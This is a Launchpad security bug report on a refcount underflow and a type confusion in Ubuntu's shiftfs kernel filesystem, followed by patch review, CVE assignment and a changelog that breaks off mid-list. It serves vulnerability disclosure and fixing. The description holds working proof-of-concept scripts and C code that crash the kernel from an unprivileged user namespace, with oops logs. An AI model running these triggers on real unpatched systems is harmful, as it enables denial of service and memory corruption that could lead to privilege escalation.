Ubuntu
linux package

refcount underflow and type confusion in shiftfs

Eoan (19.10)
Bug #1850867

Bug #1850867 reported by Jann Horn (corp account) on 2019-11-01

266

This bug affects 1 person

	Status	Importance	Assigned to
linux (Ubuntu)	Fix Released	High	Seth Forshee
Disco	Fix Released	High	Seth Forshee
Eoan	Fix Released	High	Seth Forshee
Focal	Fix Released	High	Seth Forshee

Bug Description

Tested on Ubuntu 19.10, kernel "5.3.0-19-generic #20-Ubuntu".

Ubuntu ships a filesystem "shiftfs" in fs/shiftfs.c in the kernel tree that
doesn't exist upstream. This filesystem can be mounted from user namespaces,
meaning that this is attack surface from unprivileged userspace in the default
installation.

There are two memory safety bugs around shiftfs_btrfs_ioctl_fd_replace().

#################### Bug 1: Flawed reference counting ####################

In shiftfs_btrfs_ioctl_fd_replace() ("//" comments added by me):

src = fdget(oldfd);
if (!src.file)
return -EINVAL;
// src holds one reference (assuming multithreaded execution)

ret = shiftfs_real_fdget(src.file, lfd);
// lfd->file is a file* now, but shiftfs_real_fdget didn't take any
// extra references
fdput(src);
// this drops the only reference we were holding on src, and src was
// the only thing holding a reference to lfd->file. lfd->file may be
// dangling at this point.
if (ret)
return ret;

*newfd = get_unused_fd_flags(lfd->file->f_flags);
if (*newfd < 0) {
  // always a no-op
  fdput(*lfd);
  return *newfd;
}

fd_install(*newfd, lfd->file);
// fd_install() consumes a counted reference, but we don't hold any
// counted references. so at this point, if lfd->file hasn't been freed
// yet, its refcount is one lower than it ought to be.

[...]

// the following code is refcount-neutral, so the refcount stays one too
// low.
if (ret)
shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);

shiftfs_real_fdget() is implemented as follows:

static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
{
struct shiftfs_file_info *file_info = file->private_data;
struct file *realfile = file_info->realfile;

lowerfd->flags = 0;
lowerfd->file = realfile;

/* Did the flags change since open? */
if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
return shiftfs_change_flags(lowerfd->file, file->f_flags);

return 0;
}

Therefore, the following PoC will cause reference count overdecrements; I ran it
with SLUB debugging enabled and got the following splat:

=======================================
user@ubuntu1910vm:~/shiftfs$ cat run.sh
#!/bin/sh
sync
unshare -mUr ./run2.sh
t run2user@ubuntu1910vm:~/shiftfs$ cat run2.sh
#!/bin/sh
set -e

mkdir -p mnt/tmpfs
mkdir -p mnt/shiftfs
mount -t tmpfs none mnt/tmpfs
mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
mount|grep shift
touch mnt/tmpfs/foo
gcc -o ioctl ioctl.c -Wall
./ioctl
user@ubuntu1910vm:~/shiftfs$ cat ioctl.c
#include <sys/ioctl.h>
#include <fcntl.h>
#include <err.h>
#include <unistd.h>
#include <linux/btrfs.h>
#include <sys/mman.h>

int main(void) {
  int root = open("mnt/shiftfs", O_RDONLY);
  if (root == -1) err(1, "open shiftfs root");
  int foofd = openat(root, "foo", O_RDONLY);
  if (foofd == -1) err(1, "open foofd");
  struct btrfs_ioctl_vol_args iocarg = {
    .fd = foofd
  };
  ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
  sleep(1);
  void *map = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
  if (map != MAP_FAILED) munmap(map, 0x1000);
}
user@ubuntu1910vm:~/shiftfs$ ./run.sh
none on /home/user/shiftfs/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
/home/user/shiftfs/mnt/tmpfs on /home/user/shiftfs/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
[ 183.463452] general protection fault: 0000 [#1] SMP PTI
[ 183.467068] CPU: 1 PID: 2473 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
[ 183.472170] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
[ 183.476830] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 183.478524] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 183.484585] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
[ 183.486290] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
[ 183.489617] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
[ 183.491975] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
[ 183.494311] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
[ 183.496675] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
[ 183.499011] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
[ 183.501679] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 183.503568] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
[ 183.505901] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 183.508229] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 183.510580] Call Trace:
[ 183.511396] mmap_region+0x417/0x670
[ 183.512592] do_mmap+0x3a8/0x580
[ 183.513655] vm_mmap_pgoff+0xcb/0x120
[ 183.514863] ksys_mmap_pgoff+0x1ca/0x2a0
[ 183.516155] __x64_sys_mmap+0x33/0x40
[ 183.517352] do_syscall_64+0x5a/0x130
[ 183.518548] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 183.520196] RIP: 0033:0x7f1d01bfaaf6
[ 183.521372] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
[ 183.527210] RSP: 002b:00007ffdf50bae98 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 183.529582] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f1d01bfaaf6
[ 183.531811] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 183.533999] RBP: 0000000000000000 R08: 0000000000000004 R09: 0000000000000000
[ 183.536199] R10: 0000000000000001 R11: 0000000000000246 R12: 00005616cf6f5140
[ 183.538448] R13: 00007ffdf50bbfb0 R14: 0000000000000000 R15: 0000000000000000
[ 183.540714] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm irqbypass snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core crct10dif_pclmul snd_hwdep crc32_pclmul ghash_clmulni_intel snd_pcm aesni_intel snd_seq_midi snd_seq_midi_event aes_x86_64 crypto_simd snd_rawmidi cryptd joydev input_leds snd_seq glue_helper qxl snd_seq_device snd_timer ttm drm_kms_helper drm snd fb_sys_fops syscopyarea sysfillrect sysimgblt serio_raw qemu_fw_cfg soundcore mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover psmouse ahci i2c_i801 libahci lpc_ich virtio_blk failover
[ 183.560350] ---[ end trace 4a860910803657c2 ]---
[ 183.561832] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 183.563496] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 183.569438] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
[ 183.571102] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
[ 183.573362] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
[ 183.575655] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
[ 183.577893] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
[ 183.580166] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
[ 183.582411] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
[ 183.584960] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 183.586796] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
[ 183.589035] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 183.591279] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
=======================================

Disassembly of surrounding code:

55 push rbp
4889E5 mov rbp,rsp
4157 push r15
4156 push r14
4155 push r13
4154 push r12
488B87C8000000 mov rax,[rdi+0xc8]
4C8B6810 mov r13,[rax+0x10]
498B4528 mov rax,[r13+0x28]
4883786000 cmp qword [rax+0x60],byte +0x0 <-- GPF HERE
0F8497000000 jz near 0xcc
4989FC mov r12,rdi
4989F6 mov r14,rsi

This is an attempted dereference of 0x6b6b6b6b6b6b6b6b, which is POISON_FREE; I
think this corresponds to the load of "realfile->f_op->mmap" in the source code.

#################### Bug 2: Type confusion ####################

shiftfs_btrfs_ioctl_fd_replace() calls fdget(oldfd), then without further checks
passes the resulting file* into shiftfs_real_fdget(), which does this:

static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
{
struct shiftfs_file_info *file_info = file->private_data;
struct file *realfile = file_info->realfile;

lowerfd->flags = 0;
lowerfd->file = realfile;

/* Did the flags change since open? */
if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
return shiftfs_change_flags(lowerfd->file, file->f_flags);

return 0;
}

file->private_data is a void* that points to a filesystem-dependent type; and
some filesystems even use it to store a type-cast number instead of a pointer.
The implicit cast to a "struct shiftfs_file_info *" can therefore be a bad cast.

As a PoC, here I'm causing a type confusion between struct shiftfs_file_info
(with ->realfile at offset 0x10) and struct mm_struct (with vmacache_seqnum at
offset 0x10), and I use that to cause a memory dereference somewhere around
0x4242:

=======================================
user@ubuntu1910vm:~/shiftfs_confuse$ cat run.sh
#!/bin/sh
sync
unshare -mUr ./run2.sh
user@ubuntu1910vm:~/shiftfs_confuse$ cat run2.sh
#!/bin/sh
set -e

mkdir -p mnt/tmpfs
mkdir -p mnt/shiftfs
mount -t tmpfs none mnt/tmpfs
mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
mount|grep shift
gcc -o ioctl ioctl.c -Wall
./ioctl
user@ubuntu1910vm:~/shiftfs_confuse$ cat ioctl.c
#include <sys/ioctl.h>
#include <fcntl.h>
#include <err.h>
#include <unistd.h>
#include <linux/btrfs.h>
#include <sys/mman.h>

int main(void) {
  // make our vmacache sequence number something like 0x4242
  for (int i=0; i<0x4242; i++) {
    void *x = mmap((void*)0x100000000UL, 0x1000, PROT_READ,
        MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
    if (x == MAP_FAILED) err(1, "mmap vmacache seqnum");
    munmap(x, 0x1000);
  }

  int root = open("mnt/shiftfs", O_RDONLY);
  if (root == -1) err(1, "open shiftfs root");
  int foofd = open("/proc/self/environ", O_RDONLY);
  if (foofd == -1) err(1, "open foofd");
  // trigger the confusion
  struct btrfs_ioctl_vol_args iocarg = {
    .fd = foofd
  };
  ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
}
user@ubuntu1910vm:~/shiftfs_confuse$ ./run.sh
none on /home/user/shiftfs_confuse/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
/home/user/shiftfs_confuse/mnt/tmpfs on /home/user/shiftfs_confuse/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
[ 348.103005] BUG: unable to handle page fault for address: 0000000000004289
[ 348.105060] #PF: supervisor read access in kernel mode
[ 348.106573] #PF: error_code(0x0000) - not-present page
[ 348.108102] PGD 0 P4D 0
[ 348.108871] Oops: 0000 [#1] SMP PTI
[ 348.109912] CPU: 6 PID: 2192 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
[ 348.112109] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
[ 348.114460] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
[ 348.116166] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
[ 348.121578] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
[ 348.123097] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
[ 348.125174] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
[ 348.127222] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
[ 348.129288] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
[ 348.131358] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
[ 348.133421] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
[ 348.135753] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 348.137413] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
[ 348.139451] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 348.141516] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 348.143545] Call Trace:
[ 348.144272] shiftfs_ioctl+0x65/0x76 [shiftfs]
[ 348.145562] do_vfs_ioctl+0x407/0x670
[ 348.146620] ? putname+0x4a/0x50
[ 348.147556] ksys_ioctl+0x67/0x90
[ 348.148514] __x64_sys_ioctl+0x1a/0x20
[ 348.149593] do_syscall_64+0x5a/0x130
[ 348.150658] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 348.152108] RIP: 0033:0x7f77fa76767b
[ 348.153140] Code: 0f 1e fa 48 8b 05 15 28 0d 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d e5 27 0d 00 f7 d8 64 89 01 48
[ 348.158466] RSP: 002b:00007ffd875582e8 EFLAGS: 00000217 ORIG_RAX: 0000000000000010
[ 348.160610] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f77fa76767b
[ 348.162644] RDX: 00007ffd87558310 RSI: 0000000050009401 RDI: 0000000000000003
[ 348.164680] RBP: 00007ffd87559320 R08: 00000000ffffffff R09: 0000000000000000
[ 348.167456] R10: 0000000000000000 R11: 0000000000000217 R12: 0000561c135ee100
[ 348.169530] R13: 00007ffd87559400 R14: 0000000000000000 R15: 0000000000000000
[ 348.171573] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm snd_hda_codec_generic irqbypass ledtrig_audio crct10dif_pclmul crc32_pclmul snd_hda_intel snd_hda_codec ghash_clmulni_intel snd_hda_core snd_hwdep aesni_intel aes_x86_64 snd_pcm crypto_simd cryptd glue_helper snd_seq_midi joydev snd_seq_midi_event snd_rawmidi snd_seq input_leds snd_seq_device snd_timer serio_raw qxl snd ttm drm_kms_helper mac_hid soundcore drm fb_sys_fops syscopyarea sysfillrect qemu_fw_cfg sysimgblt sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid psmouse i2c_i801 ahci virtio_net lpc_ich libahci net_failover failover virtio_blk
[ 348.188617] CR2: 0000000000004289
[ 348.189586] ---[ end trace dad859a1db86d660 ]---
[ 348.190916] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
[ 348.193401] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
[ 348.198713] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
[ 348.200226] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
[ 348.202257] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
[ 348.204294] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
[ 348.206324] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
[ 348.208362] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
[ 348.210395] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
[ 348.212710] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 348.214365] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
[ 348.216409] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 348.218349] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Killed
user@ubuntu1910vm:~/shiftfs_confuse$
=======================================

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.

Tags:

CVE References

Revision history for this message

Jann Horn (corp account) (jannh) wrote on 2019-11-01:

Oh, by the way, I'm pretty sure that shiftfs_override_object_creds() is also wrong, although I'm not sure in what situation that would actually become exploitable; it uses code like this to override credentials before creating a file in the lower fs:

(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));

I think this is supposed to be something along the lines of `make_kuid(lower_ns, from_kuid(sb->s_user_ns, fsuid))`, and it's going to do the wrong thing when the userns of the lower filesystem is not the init_user_ns.

Revision history for this message

Alex Murray (alexmurray) wrote on 2019-11-01:

Thanks for the detailed reports as always Jann.

Revision history for this message

Seth Forshee (sforshee) wrote on 2019-11-01:

0001-UBUNTU-SAUCE-shiftfs-Fix-refcount-underflow-in-btrfs.patch Edit (11.7 KiB, text/plain)

Revision history for this message

Seth Forshee (sforshee) wrote on 2019-11-01:

0002-UBUNTU-SAUCE-shiftfs-prevent-type-confusion.patch Edit (8.1 KiB, text/plain)

Revision history for this message

Seth Forshee (sforshee) wrote on 2019-11-01:

0003-UBUNTU-SAUCE-shiftfs-Correct-id-translation-for-lowe.patch Edit (4.4 KiB, text/plain)

Revision history for this message

Seth Forshee (sforshee) wrote on 2019-11-01:

Attached patches for the two bugs in the description, and the id translation issue from comment #1 (plus a couple of other similar translations that looked to have the same problem).

Jann, Christian, the third patch is new to the both of you so appreciate it if you could take a look. I've tested with the test cases for bug 1 & 2 and can no longer reproduce them with these patches. I'm in the process of getting a container running to do some light regression testing, but I'd also like to see the lxd test suite run to check for regressions. Thanks!

Revision history for this message

Jann Horn (corp account) (jannh) wrote on 2019-11-01:

I don't see any problems with those patches.

Revision history for this message

Jann Horn (corp account) (jannh) wrote on 2019-11-01:

... actually, for patch 2, I wonder whether that works properly if there is a device inside shiftfs. It might not be relevant from a security perspective, I'm not sure, but I think checking for `file->f_op.open == shiftfs_open` might be better.

Revision history for this message

Seth Arnold (seth-arnold) wrote on 2019-11-02:

Thanks Jann,

CVE-2019-15791 -- reference count error
CVE-2019-15792 -- type confusion
CVE-2019-15793 -- initns instead of userns

Thanks

Revision history for this message

Seth Forshee (sforshee) wrote on 2019-11-04:

#10

Jann: shiftfs_real_fdget() isn't relevant for special inodes. It's only used when entering shitfs via i_fops (or i_dops in the case of ioctl). For special inodes i_fop is set by init_special_inode() and never to shiftfs_file_operations.

Revision history for this message

Jann Horn (corp account) (jannh) wrote on 2019-11-04:

#11

Re #10: I don't see how that's relevant here. shiftfs_btrfs_ioctl_fd_replace() does `src = fdget(oldfd)`, meaning that `src.file` contains some random file that may have no association whatsoever with shiftfs, or may be a special inode in a shiftfs. Then it calls shiftfs_real_fdget() on that file, which (with your patch) only checks the magic of the superblock. And the special inodes would still be on shiftfs' superblock, so that check would pass, right?

Revision history for this message

Seth Forshee (sforshee) wrote on 2019-11-04:

#12

Oh, hmm. Yes, since we're checking a dentry then it is true the test would pass. I'll take another look then.

Christian Brauner (cbrauner) on 2019-11-04

Changed in linux (Ubuntu):
status:	New → In Progress

Revision history for this message

Seth Forshee (sforshee) wrote on 2019-11-04:

#13

0002-UBUNTU-SAUCE-shiftfs-prevent-type-confusion.patch Edit (9.1 KiB, text/plain)

I was able to produce an oops by modifying the reproducer for bug #2 to create a fifo in the shiftfs filesystem and pass that in the fd field for the btrfs ioctl. Changing to check f_op.open does make sense to avoid this, though we must check for shiftfs_open and shiftfs_dir_open as allowed ioctls may also be valid for directories. Attaching an updated version of the second patch. With this I cannot reproduce the oops using a fifo.

Revision history for this message

Jann Horn (corp account) (jannh) wrote on 2019-11-04:

#14

Nitpick: Ah, I guess you're looking at a different version of shiftfs - the eoan version I'm looking at uses the same ->f_op->open handler for both. If you have to do two separate checks anyway, the standard way would be to just compare the ->f_op pointer instead of the ->f_op->open handler - but that doesn't really matter.

Revision history for this message

Christian Brauner (cbrauner) wrote on 2019-11-04:

#15

Tested the kernel with Seth's latest patch and did not manage to reproduce the bugs.

Revision history for this message

Tyler Hicks (tyhicks) wrote on 2019-11-07:

#16

Hi Jann - We plan to make these three issues public on 2019-11-12. Thanks again for the report!

Revision history for this message

Seth Forshee (sforshee) wrote on 2019-11-07:

#17

lp1850867-1.sh Edit (836 bytes, text/x-sh)

Attaching all-in-one script to test patched kernels for bug #1.

Revision history for this message

Seth Forshee (sforshee) wrote on 2019-11-07:

#18

lp1850867-2.sh Edit (1007 bytes, text/x-sh)

And an all-in-one script to test for bug #2.

Tyler Hicks (tyhicks) on 2019-11-08

Changed in linux (Ubuntu Eoan):
status:	New → Fix Committed
Changed in linux (Ubuntu Disco):
status:	New → In Progress
importance:	Undecided → High
Changed in linux (Ubuntu Eoan):
importance:	Undecided → High
Changed in linux (Ubuntu Focal):
importance:	Undecided → High
Changed in linux (Ubuntu Eoan):
assignee:	nobody → Seth Forshee (sforshee)
Changed in linux (Ubuntu Disco):
assignee:	nobody → Seth Forshee (sforshee)
Changed in linux (Ubuntu Focal):
assignee:	nobody → Seth Forshee (sforshee)

Tyler Hicks (tyhicks) on 2019-11-12

Changed in linux (Ubuntu Disco):
status:	In Progress → Fix Committed

Tyler Hicks (tyhicks) on 2019-11-12

information type:

Private Security → Public Security

Revision history for this message

Ubuntu SRU Bot (ubuntu-sru-bot) wrote on 2019-11-12: Autopkgtest regression report (linux-gcp-5.3/5.3.0-1008.9~18.04.1)

#19

All autopkgtests for the newly accepted linux-gcp-5.3 (5.3.0-1008.9~18.04.1) for bionic have finished running.
The following regressions have been reported in tests triggered by the package:

linux-gcp-5.3/unknown (amd64)

Please visit the excuses page listed below and investigate the failures, proceeding afterwards as per the StableReleaseUpdates policy regarding autopkgtest regressions [1].

https://people.canonical.com/~ubuntu-archive/proposed-migration/bionic/update_excuses.html#linux-gcp-5.3

[1] https://wiki.ubuntu.com/StableReleaseUpdates#Autopkgtest_Regressions

Thank you!

Ubuntu Foundations Team Bug Bot (crichton) on 2019-11-12

tags:

added: patch

Revision history for this message

Launchpad Janitor (janitor) wrote on 2019-11-12:

#20

Download full text (53.1 KiB)

This bug was fixed in the package linux - 5.3.0-22.24

---------------
linux (5.3.0-22.24) eoan; urgency=medium

  * [REGRESSION] md/raid0: cannot assemble multi-zone RAID0 with default_layout
    setting (LP: #1849682)
    - Revert "md/raid0: avoid RAID0 data corruption due to layout confusion."

  * refcount underflow and type confusion in shiftfs (LP: #1850867) // CVE-2019-15793
    - SAUCE: shiftfs: Correct id translation for lower fs operations
    - SAUCE: shiftfs: prevent type confusion
    - SAUCE: shiftfs: Fix refcount underflow in btrfs ioctl handling

  * CVE-2018-12207
    - kvm: x86, powerpc: do not allow clearing largepages debugfs entry
    - SAUCE: KVM: vmx, svm: always run with EFER.NXE=1 when shadow paging is
      active
    - SAUCE: x86: Add ITLB_MULTIHIT bug infrastructure
    - SAUCE: kvm: mmu: ITLB_MULTIHIT mitigation
    - SAUCE: kvm: Add helper function for creating VM worker threads
    - SAUCE: kvm: x86: mmu: Recovery of shattered NX large pages
    - SAUCE: cpu/speculation: Uninline and export CPU mitigations helpers
    - SAUCE: kvm: x86: mmu: Apply global mitigations knob to ITLB_MULTIHIT

  * CVE-2019-11135
    - x86/msr: Add the IA32_TSX_CTRL MSR
    - x86/cpu: Add a helper function x86_read_arch_cap_msr()
    - x86/cpu: Add a "tsx=" cmdline option with TSX disabled by default
    - x86/speculation/taa: Add mitigation for TSX Async Abort
    - x86/speculation/taa: Add sysfs reporting for TSX Async Abort
    - kvm/x86: Export MDS_NO=0 to guests when TSX is enabled
    - x86/tsx: Add "auto" option to the tsx= cmdline parameter
    - x86/speculation/taa: Add documentation for TSX Async Abort
    - x86/tsx: Add config options to set tsx=on|off|auto
    - [Config] Disable TSX by default when possible

  * CVE-2019-0154
    - SAUCE: drm/i915: Lower RM timeout to avoid DSI hard hangs
    - SAUCE: drm/i915/gen8+: Add RC6 CTX corruption WA

  * CVE-2019-0155
    - SAUCE: drm/i915: Rename gen7 cmdparser tables
    - SAUCE: drm/i915: Disable Secure Batches for gen6+
    - SAUCE: drm/i915: Remove Master tables from cmdparser
    - SAUCE: drm/i915: Add support for mandatory cmdparsing
    - SAUCE: drm/i915: Support ro ppgtt mapped cmdparser shadow buffers
    - SAUCE: drm/i915: Allow parsing of unsized batches
    - SAUCE: drm/i915: Add gen9 BCS cmdparsing
    - SAUCE: drm/i915/cmdparser: Use explicit goto for error paths
    - SAUCE: drm/i915/cmdparser: Add support for backward jumps
    - SAUCE: drm/i915/cmdparser: Ignore Length operands during command matching

linux (5.3.0-21.22) eoan; urgency=medium

* eoan/linux: 5.3.0-21.22 -proposed tracker (LP: #1850486)

* Fix signing of staging modules in eoan (LP: #1850234)
- [Packaging] Leave unsigned modules unsigned after adding .gnu_debuglink

linux (5.3.0-20.21) eoan; urgency=medium

* eoan/linux: 5.3.0-20.21 -proposed tracker (LP: #1849064)

* eoan: alsa/sof: Enable SOF_HDA link and codec (LP: #1848490)
- [Config] Enable SOF_HDA link and codec

This bug was fixed in the package linux - 5.3.0-22.24

---------------
linux (5.3.0-22.24) eoan; urgency=medium

* [REGRESSION]  md/raid0: cannot assemble multi-zone RAID0 with default_layout
    setting (LP: #1849682)
    - Revert "md/raid0: avoid RAID0 data corruption due to layout confusion."

* CVE-2019-0154
    - SAUCE: drm/i915: Lower RM timeout to avoid DSI hard hangs
    - SAUCE: drm/i915/gen8+: Add RC6 CTX corruption WA

linux (5.3.0-21.22) eoan; urgency=medium

* eoan/linux: 5.3.0-21.22 -proposed tracker (LP: #1850486)

* Fix signing of staging modules in eoan (LP: #1850234)
    - [Packaging] Leave unsigned modules unsigned after adding .gnu_debuglink

linux (5.3.0-20.21) eoan; urgency=medium

* eoan/linux: 5.3.0-20.21 -proposed tracker (LP: #1849064)

* eoan: alsa/sof: Enable SOF_HDA link and codec (LP: #1848490)
    - [Config] Enable SOF_HDA link and codec

* Eoan update: 5.3.7 upstream stable release (LP: #1848750)
    - panic: ensure preemption is disabled during panic()
    - [Config] updateconfigs for USB_RIO500
    - USB: rio500: Remove Rio 500 kernel driver
    - USB: yurex: Don't retry on unexpected errors
    - USB: yurex: fix NULL-derefs on disconnect
    - USB: usb-skeleton: fix runtime PM after driver unbind
    - USB: usb-skeleton: fix NULL-deref on disconnect
    - xhci: Fix false warning message about wrong bounce buffer write length
    - xhci: Prevent device initiated U1/U2 link pm if exit latency is too long
    - xhci: Check all endpoints for LPM timeout
    - xhci: Fix USB 3.1 capability detection on early xHCI 1.1 spec based hosts
    - usb: xhci: wait for CNR controller not ready bit in xhci resume
    - xhci: Prevent deadlock when xhci adapter breaks during init
    - xhci: Fix NULL pointer dereference in xhci_clear_tt_buffer_complete()
    - USB: adutux: fix use-after-free on disconnect
    - USB: adutux: fix NULL-derefs on disconnect
    - USB: adutux: fix use-after-free on release
    - USB: iowarrior: fix use-after-free on disconnect
    - USB: iowarrior: fix use-after-free on release
    - USB: iowarrior: fix use-after-free after driver unbind
    - USB: usblp: fix runtime PM after driver unbind
    - USB: chaoskey: fix use-after-free on release
    - USB: ldusb: fix NULL-derefs on driver unbind
    - serial: uartlite: fix exit path null pointer
    - serial: uartps: Fix uartps_major handling
    - USB: serial: keyspan: fix NULL-derefs on open() and write()
    - USB: serial: ftdi_sio: add device IDs for Sienna and Echelon PL-20
    - USB: serial: option: add Telit FN980 compositions
    - USB: serial: option: add support for Cinterion CLS8 devices
    - USB: serial: fix runtime PM after driver unbind
    - USB: usblcd: fix I/O after disconnect
    - USB: microtek: fix info-leak at probe
    - USB: dummy-hcd: fix power budget for SuperSpeed mode
    - usb: renesas_usbhs: gadget: Do not discard queues in
      usb_ep_set_{halt,wedge}()
    - usb: renesas_usbhs: gadget: Fix usb_ep_set_{halt,wedge}() behavior
    - usb: typec: tcpm: usb: typec: tcpm: Fix a signedness bug in
